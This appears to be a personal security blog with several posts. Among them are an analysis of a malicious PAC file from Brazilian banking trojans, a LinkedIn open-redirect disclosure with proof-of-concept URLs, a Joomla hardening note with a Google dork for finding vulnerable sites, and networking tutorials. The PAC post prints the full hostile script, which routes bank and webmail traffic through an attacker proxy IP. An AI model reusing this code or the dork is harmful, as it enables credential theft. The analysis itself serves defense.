sábado, abril 07, 2012

Malicious PAC files used by Brazilian Trojans

 I just want to share some information about Brazilian Banker Trojans that, on the last years make use of pac files to auto proxy configuration just for some access as banks and mails.

I captured this pac file on the last week, that use a little obfuscate technique:


function FindProxyForURL(url, host) {
var n = new Array("duh.bradfsco",
      "bradfsco",
      "duh.bradfscoprimf",
      "bradfscoprimf",
      "duh.santandfrfmprfsaryal",
      "santandfrfmprfsaryal",
      "hsbc",
      "duh.hsbc",
      "hsbcprfmyfr",
      "duh.hsbcprfmyfr",
      "santandfrfmprfsaryal",
      "santanderempresarial",
      "banfspa",
      "duh.banfspa",
      "santandfr",
      "duh.santandfr",
      "santandfr",
      "bancorfal",
      "duh.bancorfal",
      "syds.mg.gov.br",
      "duh.syds.mg.gov.br",
      "cytybank",
      "duh.cytybank",
      "sycredy",
      "duh.sycredy",
      "amerycanexpress",
      "duh.amerycanexpress",
      "ytau",
      "duh.ytau",
      "ytaupersonnalyte",
      "duh.ytaupersonnalyte",
      "hotmayl",
      "duh.hotmayl",
      "lyve",
      "duh.lyve",
      "pazpal",
      "duh.pazpal",
      "cayxa.gov.br",
      "duh.cayxa.gov.br",
      "duh.gmayl",
      "gmayl",
      "duh.hotmayl",
      "hotmayl"

); 
 
for(var i =0;i<n.length;i++) {
   str = n[i];
   str = str.replace(/f/gi,"e");
   str = str.replace(/z/gi,"y");
   str = str.replace(/duh/gi,"www");
   str = str.replace(/y/gi, "i");
         if(str.indexOf("caixa") != -1)
                        str = str;
   else if(str.indexOf("paypal") != -1)
        str = str + ".com";
   else if(str.indexOf("gmail") != -1)
        str = str + ".com";
   else if(str.indexOf("hotmail") != -1)
        str = str + ".com";
   else
        str = str + ".com.br";
   if (shExpMatch(host, str)) {
      return "PROXY 218.208.33.196:80";
    }
   }
  return "DIRECT";
}
 
See that, beyond Brazilian banks, have some credential 
harvester for gmail, hotmail/live and paypal.
 
The url for auto-proxy configuration that I find: 
 
http://218.208.33.196/readme/feather.txt
 
This IP have a bad reputation by open proxy, spam 
and phishing activity  
  
Some References by @assoline:
 
Benign_Feature_Malicious_Use
attackers-using-malicious-pac-files-phishing-attacks
 
 
 
 
 
  

segunda-feira, março 26, 2012

Linkedin Portal URL Redirection (Open Redirection) Vulnerability


 After some time,  that is a old problem, but only now was fixed ...


=======================================================
Linkedin Portal URL Redirection (Open Redirection) Vulnerability
=======================================================

1. OVERVIEW

A security flaw on main linked in portal: www.linkedin.com

2. SITE SERVICE DESCRIPTION

LinkedIn is the world’s largest professional network with over 120 million members and growing rapidly. LinkedIn connects you to your trusted contacts and helps you exchange knowledge, ideas, and opportunities with a broader network of professionals.
More Information: http://learn.linkedin.com/what-is-linkedin/

3. VULNERABILITY DESCRIPTION

A security flaw on main linkedin portal: www.linkedin.com trough the "redirect" file with "url" parameter. This parameter is unvalidated by application resulting in a Open redirect Flaw, where it receive any url and forward the user for it. 

4. PROOF-OF-CONCEPT/EXPLOIT

+ Open Redirect (OWASP Top 10 2010 / A10 - Unvalidated Redirects and Forwards)

http://www.linkedin.com/redirect?url=www.google.com.br&urlhash=OpenRedirect

http://www.linkedin.com/redir/redirect?url=www.google.com%2F&urlhash=asasdad

5. IMPACT

This flaw can be used by a malicious user to send phishing to the linked in customers, abusing of the users trust on Linkedin portal, tricking the user. This user can be forward to a linkedin clone site to stolen credentials, to some malicious site hosting malware and more.

6. VENDOR

www.linkedin.com - http://www.linkedin.com

7. CREDIT

This vulnerability was discovered by:
Emanuel dos Reis Rodrigues
emanueldosreis at gmail.com
twitter: emanueldosreis

8. DISCLOSURE TIME-LINE

01-28-2012: Vulnerability discovered
01-29-2012: Vendor Contacted by e-mail Customer support support@linkedin.com,linkedin_support@cs.linkedin.com
02-04-2012: Vendor answer creating a ticket: 120129-000734
02-04-2012: Vulnerability Reported
03-26-2012: Vulnerability Corrected
03-26-2012: Public Disclosure

9. REFERENCES

Top 10 2010-A10-Unvalidated Redirects and Forwards


terça-feira, março 20, 2012

Joomla Privilege Escalation Flaw and some CMS hardening

On the last week, was released this flaw [1].

The problem is amplified by user auto registration on com_users, that, by default is allowed anonymous users to register themselves as Administrator leading to Joomla Administrator take over.

This problem affect 1.6.x/1.7.x/2.5.0-2.5.2 versions [2].

Now, many defacers are using google to find vulnerable sites to attack.

Dork: inurl:index.php?option=com_users&view=registration

May be that, coming soon , we have a rise of a worm to exploit it, …. remember about JBOSS Worm ? that use CVE-2010-0738 to spread ?


So, we have some mitigation options about this flaw:

-> Block the user auto registration resource on com_user

-> Upgrade to 2.5.3, because 1.6.x and 1.7.x have no patch yet.


For all Joomla's/CMS installation, you can follow some steps more:

- Remove all unnecessary plugins/components/extensions/others, keeping what really is needed.
- Use the minimum of extensions as possible.
- Use the lastest version of all components and core
- Only allow the apache user to write where really is needed.
- Keep yourself up to date about Joomla related vulnerabilities
- Remove all default users and groups when it is possible.
- Control the access to /Administrator, by source IP, change the Administrator path and block IP sources with a bad reputation
- Use some WAF - Web Application Firewall , as ModSecurity
- Use Antivirus, yes, do it at your Linux Server, it can save your life.
- Use a file integrity checker as AIDE.
- Use database and system accounts with minor privileges.
- Make a hardening on PHP configuration
- Take care about temporary folders as /tmp /var/tmp/ joomla uploads, e.g. don't allowing execution programs from here with noexec partition bit.
- Implement strong password policy for joomla' s administrators
- Use jail system for apache's instances.
- Always use captcha when it's possible
- Use Enhanced Security as SELinux or AppArmor


This is not all , but can be followed for generic CMS/WebServer Hardening…


[1] http://jeffchannell.com/Joomla/joomla-161725-privilege-escalation-vulnerability.html
[2] http://developer.joomla.org/security/news/395-20120303-core-privilege-escalation.html


t: @emanueldosreis

domingo, julho 24, 2011

LOIC (Low Orbit Ion Cannon) DDoS/DoS Analysis [update]



This post is only a update note to complement the follow spiderlabs article:
http://blog.spiderlabs.com/2011/01/loic-ddos-analysis-and-detection.html
If you read, you need to now that, the LOIC HTTP GET request was fixed:

GET / HTTP/1.0

But, for lucky of the anonymous target, keep the 1.0 HTTP protocol version, that can be easily controlled /mitigated by Mod-Security.


@trustwave , @spiderlabs, @emanueldosreis , @modsecurity #infosec

segunda-feira, março 22, 2010

Instalando o Web Application Security Scanner Skipfish no BackTrack 4 Final

Skipfish é um scanner de vulnerabilidades web recém lançado pelo Google, apresentando mais uma opção para levantamento de informações de servidores Web.

Esta dica também funciona para instalar em Ubuntu e outras Debian based ...


apt-get install libidn11-dev

cd /tmp

wget -c http://skipfish.googlecode.com/files/skipfish-1.10b.tgz

tar -zxvf skipfish-1.10b.tgz

cd skipfish

make && cp skipfish /bin/


Para o skipfish funcionar é necessário ter uma wordlist, incialmente podemos usar uma que vem junto com os fontes do programa do
diretório dictionaries/ o arquivo complete.wl.

cp dictionaries/complete.wl /root


Também é necessário um diretório onde serão gerados os relatórios a partir da opção -o, juntando tudo, um simples scanner seria feito asssim:

skipfish -o /tmp/relatorio -W /root/complete.wl http://www.microsoft.com


Para acessar os relatorios: Abra o navegador web: /tmp/relatorio/index.html


Maiores informações, http://code.google.com/p/skipfish/wiki/SkipfishDoc


Emanuel dos Reis Rodrigues

terça-feira, setembro 29, 2009

Tutorial para Configuração de ADSL OI Velox ( Resolução do problema em "Boa Vista - RR" )

Depois de mais de 2 anos sem escrever nada no blog, resolvi iniciar o processo de volta ... com este tutorial .. que acredito que vai ajudar o pessoal de Boa Vista com relação ao OI Velox.

Ha alguns dias, chegou em Boa Vista - RR, o serviço OI Velox. Durante muito tempo, Boa Vista só recebia conexão com a internet através de satelite, o que resultava em internet com um custo muito alto( 1Mb = R$ 6.000,00 .. dependendo do humor das operadoras, tempo de contrato, etc ... ), além de uma qualidade degradada em função do delay ( média de 600 ms de Boa vista para o Mundo ). Com a OI Velox, o custo caiu e a conexão é feita com Fibra ótica através de um acordo entre a OI e a CanTV da Venezuela e ainda a EletroNorte, a fibra se liga ao brasil por meio de cabos submarinos, chegando até infraestrutura da OI no brasil.
Bem, de R$ 6.000,00 caiu para R$ 300,00 e de 600 ms caiu para uma média de 160 ms, o que resultou ainda em reclamações por que a demanda foi e está muito maior que a oferta, empresas por exemplo pode se contar nos dedos quem conseguiu contratar ... Deixando isto de lado, apareceram outros problemas, o discador da OI Velox não funciona, configurar o modem adsl para fazer a discagem também não, usando o linux com pppoeconf também não, ambos abrem apenas algumas páginas e finalmente somente a conexão pppoe do próprio windows funciona corretamente. Para a OI está tudo certo, pois funciona com o rwindows ... Ligar no suporte ? não suportamos o linux ! não recebemos treinamento adequado ! não sabemos como rotear os modems ADSL ! enfim ... não ajudam em nada ... e não tem niguém na OI local da área de rede ...

Até então, não era problema meu e eu não tive oportunidade de dar uma olhada, foi quando o problema chegou para min neste fim de semana, pois só aí tive a oportunidade de testar ... quando configurei me deparei pelas mesmas reclamações acima.

O problema de abrir uns sites e outros não é devido ao tamanho da MTU (http://en.wikipedia.org/wiki/Maximum_transmission_unit) , alguns sites se ajustam de acordo com a capacidade de envio de dados por parte do cliente, no caso do discador rwindows, ele se auto ajusta e os outros não.

Já era de meu conhecimento que conexões pppoe utilizam um mtu padrão de 1492, e o ppoeconf gera uma configuração compatível com este valor. No debian, o pppoeconf ainda orienta sob a possibilidade de ter que diminuir, sugerindo 1412 em algumas situações. Pois bem, foi o que testei 1492 e 1412 ... no primeiro abria poucos sites, no segundo alguns a mais ... mas não era satisfatório então deixei o achismo de lado e fiz o cálculo do MTU adequado para esta rede, o valor encontrado foi 1488.

Primeiro instalamos e configuramos,

apt-get install pppoe pppoeconf

não iremos utilizar o pppoeconf como se costuma, vamos usar o arquivo de configuração abaixo, crie o arquivo /etc/ppp/peers/oi-internet

noipdefault
defaultroute
replacedefaultroute
hide-password
#lcp-echo-interval 30
#lcp-echo-failure 4
noauth
mtu 1488
persist
#maxfail 0
#holdoff 20
plugin rp-pppoe.so eth0
user "COLOQUESEULOGIN@oi.com.br"
usepeerdns


Veja que COLOQUESEULOGIN@oi.com.br é um exemplo, troque pelo seu login de conexão OI velox, geralmente seu email@io.com.br ou @telemar.com.br.

Depois inclua a senha com o comando abaixo, trocando o login e a senha pelos seus:

echo '"COLOQUESEULOGIN@oi.com.br" * "SUASENHA"' >> /etc/ppp/pap-secrets


Configure sua interface eth0 como cliente dhcp e conecte o cabo vindo do router adsl, você irá pegar o ip vindo do router adsl.

dhclient eth0


Se quiser pode fixar no /etc/network/interfaces para fazer na inicialização

auto eth0
iface eth0 inet dhcp


Depois de pegar o ip do router, use os comandos:

Para conectar:

pon oi-internet


Para desconectar:

poff oi-internet


Para automatizar tudo na inicialização, no arquivo /etc/network/interfaces:

auto eth0
iface eth0 inet dhcp

auto oi
iface oi inet ppp
pre-up /sbin/ifconfig eth0 up
provider oi-internet


É isso, bem simples. Quem quiser usar o pppoeconf, não tem problema, use e depois edite o arquivo /etc/ppp/peers/dsl-provider e descomente e altere o valor da mtu para 1488 e pronto, use pon dsl-provider para conectar.

Quanto as pessoas que querem rotear no adsl, não o fiz ainda, pois estou sem modem, mas procure uma forma de trocar a MTU da conexão pppoe e incluir o valor 1488, que também irá funcionar normalmente...

Espero ter ajudado, qualquer dúvida me passem email emanueldosreis**NOSPAM gmail.com

segunda-feira, junho 04, 2007

DNS Forward

DNS Forward

Este é um procedimento bem simples, mas muito útil onde se tem vários servidores DNS em uma rede ou se o provedor só libera pesquisa DNS em um servidor dele ( Acredite : Isso acontece com alguns provedores, principalmente os xing .. lings ... ).

Imaginemos o seguinte cenário: Você tem um servidor de dns central e outros em sub-redes fazendo somente cache, mas você não gostaria de liberar a pesquisa deste servidor direto aos roots servers , por questões de segurança e consumo de banda . Então colocamos eles para pesquisarem somente no central.

Existem 2 opções no bind9 que faz esse trabalho: forwarders e forward

dentro da seção options { } ;

inclua:

forwarders { 10.50.10.1 ; };
forward first ;

Em forwarders você pode incluir mais de um ip, lembrando que este ip é o do servidor de dns no qual ele irá pesquisar.

forward only, quer dizer que este servidor sempre vai pesquisar no dns especificado em forwarders, a não ser que a pesquisa esteja no próprio cache.